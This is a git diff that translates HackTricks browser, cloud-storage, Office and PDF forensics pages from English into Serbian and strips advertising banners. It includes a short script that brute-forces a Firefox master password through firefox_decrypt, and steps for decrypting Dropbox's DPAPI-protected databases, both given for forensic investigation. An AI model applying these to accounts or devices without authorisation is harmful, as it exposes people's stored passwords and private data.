+- **logins.json**: Enkriptovane prijavne informacije.
+- **key4.db** ili **key3.db**: Čuva ključeve za enkripciju radi zaštite osetljivih informacija.
 
-Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled.
-
-To try to decrypt the master password, you can use [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
-With the following script and call you can specify a password file to brute force:
+Pored toga, proveru podešavanja pregledača za zaštitu od phishing-a možete izvršiti pretraživanjem `browser.safebrowsing` unosa u `prefs.js`, što ukazuje na to da li su funkcije sigurne navigacije omogućene ili onemogućene.
 
+Da biste pokušali da dekriptujete glavnu lozinku, možete koristiti [https://github.com/unode/firefox_decrypt](https://github.com/unode/firefox_decrypt)\
+Sa sledećim skriptom i pozivom možete odrediti datoteku lozinki za brute force:
 ```bash:brute.sh
 #!/bin/bash
 
 #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
 passfile=$1
 while read pass; do
-  echo "Trying $pass"
-  echo "$pass" | python firefox_decrypt.py
+echo "Trying $pass"
+echo "$pass" | python firefox_decrypt.py
 done < $passfile
 ```
-
 ![](<../../../images/image (417).png>)
 
 ## Google Chrome
 
-Google Chrome stores user profiles in specific locations based on the operating system:
+Google Chrome čuva korisničke profile na specifičnim lokacijama u zavisnosti od operativnog sistema:
 
 - **Linux**: `~/.config/google-chrome/`
 - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\`
 - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/`
 
-Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data:
+Unutar ovih direktorijuma, većina korisničkih podataka može se naći u **Default/** ili **ChromeDefaultData/** folderima. Sledeće datoteke sadrže značajne podatke:
 
-- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads.
-- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available.
-- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
-- **Bookmarks**: User bookmarks.
-- **Web Data**: Contains form history.
-- **Favicons**: Stores website favicons.
-- **Login Data**: Includes login credentials like usernames and passwords.
-- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs.
-- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed.
-- **Extensions**: Directories for browser extensions and addons.
-- **Thumbnails**: Stores website thumbnails.
-- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more.
-- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output.
+- **History**: Sadrži URL-ove, preuzimanja i ključne reči za pretragu. Na Windows-u, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) može se koristiti za čitanje istorije. Kolona "Transition Type" ima različita značenja, uključujući klikove korisnika na linkove, otkucane URL-ove, slanje obrazaca i ponovna učitavanja stranica.
+- **Cookies**: Čuva kolačiće. Za inspekciju, dostupna je [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html).
+- **Cache**: Drži keširane podatke. Da bi se izvršila inspekcija, korisnici Windows-a mogu koristiti [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html).
+- **Bookmarks**: Korisnički obeleživači.
+- **Web Data**: Sadrži istoriju obrazaca.
+- **Favicons**: Čuva favicon-e sajtova.
+- **Login Data**: Uključuje podatke za prijavu kao što su korisnička imena i lozinke.
+- **Current Session**/**Current Tabs**: Podaci o trenutnoj sesiji pretraživanja i otvorenim karticama.
+- **Last Session**/**Last Tabs**: Informacije o sajtovima aktivnim tokom poslednje sesije pre nego što je Chrome zatvoren.
+- **Extensions**: Direktorijumi za ekstenzije i dodatke pretraživača.
+- **Thumbnails**: Čuva sličice sajtova.
+- **Preferences**: Datoteka bogata informacijama, uključujući podešavanja za dodatke, ekstenzije, iskačuće prozore, obaveštenja i još mnogo toga.
+- **Browser’s built-in anti-phishing**: Da biste proverili da li su zaštita od prevara i zaštita od malvera omogućene, pokrenite `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Potražite `{"enabled: true,"}` u izlazu.
 
 ## **SQLite DB Data Recovery**
 
-As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
+Kao što možete primetiti u prethodnim sekcijama, i Chrome i Firefox koriste **SQLite** baze podataka za čuvanje podataka. Moguće je **oporaviti obrisane unose koristeći alat** [**sqlparse**](https://github.com/padfoot999/sqlparse) **ili** [**sqlparse_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases).
 
 ## **Internet Explorer 11**
 
-Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management.
+Internet Explorer 11 upravlja svojim podacima i metapodacima na različitim lokacijama, pomažući u razdvajanju sačuvanih informacija i njihovih odgovarajućih detalja za lak pristup i upravljanje.
 
 ### Metadata Storage
 
-Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype.
+Metapodaci za Internet Explorer čuvaju se u `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (gde je VX V01, V16 ili V24). Uz to, datoteka `V01.log` može pokazati razlike u vremenu modifikacije sa `WebcacheVX.data`, što ukazuje na potrebu za popravkom koristeći `esentutl /r V01 /d`. Ovi metapodaci, smešteni u ESE bazi podataka, mogu se oporaviti i inspekciji pomoću alata kao što su photorec i [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html). Unutar **Containers** tabele, može se uočiti specifične tabele ili kontejneri gde je svaki segment podataka smešten, uključujući detalje o kešu za druge Microsoft alate kao što je Skype.
 
 ### Cache Inspection
 
-The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times.
+Alat [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) omogućava inspekciju keša, zahtevajući lokaciju foldera za ekstrakciju podataka iz keša. Metapodaci za keš uključuju ime datoteke, direktorijum, broj pristupa, URL izvor i vremenske oznake koje označavaju vreme kreiranja, pristupa, modifikacije i isteka keša.
 
 ### Cookies Management
 
-Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory.
+Kolačići se mogu istraživati koristeći [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), sa metapodacima koji obuhvataju imena, URL-ove, brojeve pristupa i razne vremenske detalje. Trajni kolačići se čuvaju u `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, dok se sesijski kolačići nalaze u memoriji.
 
 ### Download Details
 
-Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
+Metapodaci o preuzimanjima su dostupni putem [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), sa specifičnim kontejnerima koji sadrže podatke kao što su URL, tip datoteke i lokacija preuzimanja. Fizičke datoteke se mogu naći pod `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`.
 
 ### Browsing History
 
-To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
+Da biste pregledali istoriju pretraživanja, može se koristiti [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html), zahtevajući lokaciju ekstraktovanih datoteka istorije i konfiguraciju za Internet Explorer. Metapodaci ovde uključuju vremena modifikacije i pristupa, zajedno sa brojevima pristupa. Datoteke istorije se nalaze u `%userprofile%\Appdata\Local\Microsoft\Windows\History`.
 
 ### Typed URLs
 
-Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times.
+Otucani URL-ovi i njihova vremena korišćenja čuvaju se unutar registra pod `NTUSER.DAT` na `Software\Microsoft\InternetExplorer\TypedURLs` i `Software\Microsoft\InternetExplorer\TypedURLsTime`, prateći poslednjih 50 URL-ova koje je korisnik uneo i njihova poslednja vremena unosa.
 
 ## Microsoft Edge
 
-Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are:
+Microsoft Edge čuva korisničke podatke u `%userprofile%\Appdata\Local\Packages`. Putanje za različite tipove podataka su:
 
 - **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC`
 - **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat`
@@ -143,24 +133,24 @@ Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The p
 
 ## Safari
 
-Safari data is stored at `/Users/$User/Library/Safari`. Key files include:
+Safari podaci se čuvaju na `/Users/$User/Library/Safari`. Ključne datoteke uključuju:
 
-- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. Use `sqlite3` to query.
-- **Downloads.plist**: Information about downloaded files.
-- **Bookmarks.plist**: Stores bookmarked URLs.
-- **TopSites.plist**: Most frequently visited sites.
-- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve.
-- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse.
-- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse.
-- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active.
+- **History.db**: Sadrži tabele `history_visits` i `history_items` sa URL-ovima i vremenskim oznakama poseta. Koristite `sqlite3` za upite.
+- **Downloads.plist**: Informacije o preuzetim datotekama.
+- **Bookmarks.plist**: Čuva obeležene URL-ove.
+- **TopSites.plist**: Najčešće posećeni sajtovi.
+- **Extensions.plist**: Lista ekstenzija pretraživača Safari. Koristite `plutil` ili `pluginkit` za preuzimanje.
+- **UserNotificationPermissions.plist**: Domeni kojima je dozvoljeno slanje obaveštenja. Koristite `plutil` za analizu.
+- **LastSession.plist**: Kartice iz poslednje sesije. Koristite `plutil` za analizu.
+- **Browser’s built-in anti-phishing**: Proverite koristeći `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. Odgovor 1 označava da je funkcija aktivna.
 
 ## Opera
 
-Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads.
+Opera podaci se nalaze u `/Users/$USER/Library/Application Support/com.operasoftware.Opera` i deli format sa Chrome-om za istoriju i preuzimanja.
 
-- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`.
+- **Browser’s built-in anti-phishing**: Proverite tako što ćete videti da li je `fraud_protection_enabled` u datoteci Preferences postavljeno na `true` koristeći `grep`.
 
-These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers.
+Ove putanje i komande su ključne za pristup i razumevanje podataka o pretraživanju koje čuvaju različiti web pretraživači.
 
 ## References
 
@@ -169,12 +159,4 @@ These paths and commands are crucial for accessing and understanding the browsin
 - [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file)
 - **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
index c22a6f566..ab6437275 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md
@@ -1,50 +1,42 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-Some things that could be useful to debug/deobfuscate a malicious VBS file:
+Neke stvari koje bi mogle biti korisne za debagovanje/deobfuskaciju zlonamernog VBS fajla:
 
 ## echo
-
 ```bash
 Wscript.Echo "Like this?"
 ```
-
-## Commnets
-
+## Komentari
 ```bash
 ' this is a comment
 ```
-
 ## Test
-
 ```bash
 cscript.exe file.vbs
 ```
-
-## Write data to a file
-
+## Napišite podatke u datoteku
 ```js
 Function writeBinary(strBinary, strPath)
 
-    Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
+Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
 
-    ' below lines purpose: checks that write access is possible!
-    Dim oTxtStream
+' below lines purpose: checks that write access is possible!
+Dim oTxtStream
 
-    On Error Resume Next
-    Set oTxtStream = oFSO.createTextFile(strPath)
+On Error Resume Next
+Set oTxtStream = oFSO.createTextFile(strPath)
 
-    If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
-    On Error GoTo 0
+If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
+On Error GoTo 0
 
-    Set oTxtStream = Nothing
-    ' end check of write access
+Set oTxtStream = Nothing
+' end check of write access
 
-    With oFSO.createTextFile(strPath)
-        .Write(strBinary)
-        .Close
-    End With
+With oFSO.createTextFile(strPath)
+.Write(strBinary)
+.Close
+End With
 
 End Function
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 99792162b..2c690925e 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -1,114 +1,97 @@
-# Local Cloud Storage
+# Lokalna Cloud Skladišta
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ## OneDrive
 
-In Windows, you can find the OneDrive folder in `\Users\\AppData\Local\Microsoft\OneDrive`. And inside `logs\Personal` it's possible to find the file `SyncDiagnostics.log` which contains some interesting data regarding the synchronized files:
+U Windows-u, možete pronaći OneDrive folder u `\Users\\AppData\Local\Microsoft\OneDrive`. I unutar `logs\Personal` moguće je pronaći datoteku `SyncDiagnostics.log` koja sadrži neke zanimljive podatke o sinhronizovanim datotekama:
 
-- Size in bytes
-- Creation date
-- Modification date
-- Number of files in the cloud
-- Number of files in the folder
-- **CID**: Unique ID of the OneDrive user
-- Report generation time
-- Size of the HD of the OS
+- Veličina u bajtovima
+- Datum kreiranja
+- Datum modifikacije
+- Broj datoteka u cloudu
+- Broj datoteka u folderu
+- **CID**: Jedinstveni ID OneDrive korisnika
+- Vreme generisanja izveštaja
+- Veličina HD operativnog sistema
 
-Once you have found the CID it's recommended to **search files containing this ID**. You may be able to find files with the name: _**\.ini**_ and _**\.dat**_ that may contain interesting information like the names of files synchronized with OneDrive.
+Kada pronađete CID, preporučuje se da **pretražujete datoteke koje sadrže ovaj ID**. Možda ćete moći da pronađete datoteke sa imenom: _**\.ini**_ i _**\.dat**_ koje mogu sadržati zanimljive informacije kao što su imena datoteka sinhronizovanih sa OneDrive-om.
 
 ## Google Drive
 
-In Windows, you can find the main Google Drive folder in `\Users\\AppData\Local\Google\Drive\user_default`\
-This folder contains a file called Sync_log.log with information like the email address of the account, filenames, timestamps, MD5 hashes of the files, etc. Even deleted files appear in that log file with its corresponding MD5.
+U Windows-u, možete pronaći glavni Google Drive folder u `\Users\\AppData\Local\Google\Drive\user_default`\
+Ovaj folder sadrži datoteku pod nazivom Sync_log.log sa informacijama kao što su email adresa naloga, imena datoteka, vremenski oznake, MD5 heševi datoteka, itd. Čak i obrisane datoteke se pojavljuju u toj log datoteci sa svojim odgovarajućim MD5.
 
-The file **`Cloud_graph\Cloud_graph.db`** is a sqlite database which contains the table **`cloud_graph_entry`**. In this table you can find the **name** of the **synchronized** **files**, modified time, size, and the MD5 checksum of the files.
+Datoteka **`Cloud_graph\Cloud_graph.db`** je sqlite baza podataka koja sadrži tabelu **`cloud_graph_entry`**. U ovoj tabeli možete pronaći **ime** **sinhronizovanih** **datoteka**, vreme modifikacije, veličinu i MD5 kontrolni zbir datoteka.
 
-The table data of the database **`Sync_config.db`** contains the email address of the account, the path of the shared folders and the Google Drive version.
+Podaci tabele baze podataka **`Sync_config.db`** sadrže email adresu naloga, putanju deljenih foldera i verziju Google Drive-a.
 
 ## Dropbox
 
-Dropbox uses **SQLite databases** to manage the files. In this\
-You can find the databases in the folders:
+Dropbox koristi **SQLite baze podataka** za upravljanje datotekama. U ovom\
+Možete pronaći baze podataka u folderima:
 
 - `\Users\\AppData\Local\Dropbox`
 - `\Users\\AppData\Local\Dropbox\Instance1`
 - `\Users\\AppData\Roaming\Dropbox`
 
-And the main databases are:
+A glavne baze podataka su:
 
 - Sigstore.dbx
 - Filecache.dbx
 - Deleted.dbx
 - Config.dbx
 
-The ".dbx" extension means that the **databases** are **encrypted**. Dropbox uses **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]())
+Ekstenzija ".dbx" znači da su **baze podataka** **enkriptovane**. Dropbox koristi **DPAPI** ([https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)?redirectedfrom=MSDN]())
 
-To understand better the encryption that Dropbox uses you can read [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
+Da biste bolje razumeli enkripciju koju Dropbox koristi, možete pročitati [https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html](https://blog.digital-forensics.it/2017/04/brush-up-on-dropbox-dbx-decryption.html).
 
-However, the main information is:
+Međutim, glavne informacije su:
 
-- **Entropy**: d114a55212655f74bd772e37e64aee9b
-- **Salt**: 0D638C092E8B82FC452883F95F355B8E
-- **Algorithm**: PBKDF2
-- **Iterations**: 1066
+- **Entropija**: d114a55212655f74bd772e37e64aee9b
+- **So**: 0D638C092E8B82FC452883F95F355B8E
+- **Algoritam**: PBKDF2
+- **Iteracije**: 1066
 
-Apart from that information, to decrypt the databases you still need:
+Pored tih informacija, da biste dekriptovali baze podataka, još uvek vam je potrebna:
 
-- The **encrypted DPAPI key**: You can find it in the registry inside `NTUSER.DAT\Software\Dropbox\ks\client` (export this data as binary)
-- The **`SYSTEM`** and **`SECURITY`** hives
-- The **DPAPI master keys**: Which can be found in `\Users\\AppData\Roaming\Microsoft\Protect`
-- The **username** and **password** of the Windows user
+- **enkriptovana DPAPI ključ**: Možete ga pronaći u registru unutar `NTUSER.DAT\Software\Dropbox\ks\client` (izvezite ove podatke kao binarne)
+- **`SYSTEM`** i **`SECURITY`** hives
+- **DPAPI master ključevi**: Koji se mogu pronaći u `\Users\\AppData\Roaming\Microsoft\Protect`
+- **korisničko ime** i **lozinka** Windows korisnika
 
-Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:**
+Zatim možete koristiti alat [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi_data_decryptor.html)**:**
 
 ![](<../../../images/image (448).png>)
 
-If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber_chef receipt]() putting the primary key as the "passphrase" inside the receipt.
-
-The resulting hex is the final key used to encrypt the databases which can be decrypted with:
+Ako sve prođe kako se očekuje, alat će označiti **primarni ključ** koji treba da **koristite za oporavak originalnog**. Da biste povratili originalni, jednostavno koristite ovaj [cyber_chef recept]() stavljajući primarni ključ kao "lozinku" unutar recepta.
 
+Rezultantni heksadecimalni broj je konačni ključ koji se koristi za enkripciju baza podataka koje se mogu dekriptovati sa:
 ```bash
 sqlite -k  config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
 ```
+Baza podataka **`config.dbx`** sadrži:
 
-The **`config.dbx`** database contains:
+- **Email**: Email korisnika
+- **usernamedisplayname**: Ime korisnika
+- **dropbox_path**: Putanja gde se nalazi dropbox folder
+- **Host_id: Hash** korišćen za autentifikaciju u cloud. Ovo se može opozvati samo sa veba.
+- **Root_ns**: Identifikator korisnika
 
-- **Email**: The email of the user
-- **usernamedisplayname**: The name of the user
-- **dropbox_path**: Path where the dropbox folder is located
-- **Host_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
-- **Root_ns**: User identifier
+Baza podataka **`filecache.db`** sadrži informacije o svim datotekama i folderima sinhronizovanim sa Dropbox-om. Tabela `File_journal` je ona sa više korisnih informacija:
 
-The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
+- **Server_path**: Putanja gde se datoteka nalazi unutar servera (ova putanja je prethodna sa `host_id` klijenta).
+- **local_sjid**: Verzija datoteke
+- **local_mtime**: Datum modifikacije
+- **local_ctime**: Datum kreiranja
 
-- **Server_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
-- **local_sjid**: Version of the file
-- **local_mtime**: Modification date
-- **local_ctime**: Creation date
+Ostale tabele unutar ove baze sadrže zanimljivije informacije:
 
-Other tables inside this database contain more interesting information:
-
-- **block_cache**: hash of all the files and folders of Dropbox
-- **block_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
-- **mount_table**: Share folders of dropbox
-- **deleted_fields**: Dropbox deleted files
+- **block_cache**: hash svih datoteka i foldera Dropbox-a
+- **block_ref**: Povezuje hash ID tabele `block_cache` sa ID datoteke u tabeli `file_journal`
+- **mount_table**: Deljeni folderi Dropbox-a
+- **deleted_fields**: Obrišene datoteke Dropbox-a
 - **date_added**
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 34433ce87..f736ecd16 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -1,36 +1,18 @@
-# Office file analysis
+# Analiza Office datoteka
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+Za više informacija proverite [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Ovo je samo sažetak:
 
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Microsoft je kreirao mnoge formate office dokumenata, pri čemu su dva glavna tipa **OLE formati** (kao što su RTF, DOC, XLS, PPT) i **Office Open XML (OOXML) formati** (kao što su DOCX, XLSX, PPTX). Ovi formati mogu uključivati makroe, što ih čini metama za phishing i malver. OOXML datoteke su strukturirane kao zip kontejneri, što omogućava inspekciju kroz raspakivanje, otkrivajući hijerarhiju datoteka i foldera i sadržaj XML datoteka.
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+Da bi se istražile strukture OOXML datoteka, data je komanda za raspakivanje dokumenta i struktura izlaza. Tehnike za skrivanje podataka u ovim datotekama su dokumentovane, što ukazuje na kontinuiranu inovaciju u skrivanju podataka unutar CTF izazova.
 
-For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
-
-Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents.
-
-To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges.
-
-For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
-
-Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
+Za analizu, **oletools** i **OfficeDissector** nude sveobuhvatne alate za ispitivanje kako OLE tako i OOXML dokumenata. Ovi alati pomažu u identifikaciji i analizi ugrađenih makroa, koji često služe kao vektori za isporuku malvera, obično preuzimajući i izvršavajući dodatne zlonamerne pakete. Analiza VBA makroa može se izvršiti bez Microsoft Office-a korišćenjem Libre Office-a, koji omogućava debagovanje sa tačkama prekida i posmatranim promenljivama.
 
+Instalacija i korišćenje **oletools** su jednostavni, sa komandama za instalaciju putem pip-a i vađenje makroa iz dokumenata. Automatsko izvršavanje makroa se pokreće funkcijama kao što su `AutoOpen`, `AutoExec` ili `Document_Open`.
 ```bash
 sudo pip3 install -U oletools
 olevba -c /path/to/document #Extract macros
 ```
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index 79799f2d8..f6e2bae42 100644
--- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -1,28 +1,20 @@
-# PDF File analysis
+# PDF analiza
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+**Za više detalja proverite:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
 
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+PDF format je poznat po svojoj složenosti i potencijalu za prikrivanje podataka, što ga čini centralnom tačkom za CTF forenzičke izazove. Kombinuje elemente običnog teksta sa binarnim objektima, koji mogu biti kompresovani ili enkriptovani, i može uključivati skripte u jezicima kao što su JavaScript ili Flash. Da bi se razumeo PDF struktura, može se konsultovati [uvodni materijal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/) Didiera Stevensa, ili koristiti alate kao što su tekstualni editor ili PDF-specifični editor kao što je Origami.
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+Za dubinsko istraživanje ili manipulaciju PDF-ova, dostupni su alati kao što su [qpdf](https://github.com/qpdf/qpdf) i [Origami](https://github.com/mobmewireless/origami-pdf). Sakriveni podaci unutar PDF-ova mogu biti prikriveni u:
 
-**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
+- Nevidljivim slojevima
+- XMP metapodacima formata od Adobe-a
+- Inkrementalnim generacijama
+- Tekstu iste boje kao pozadina
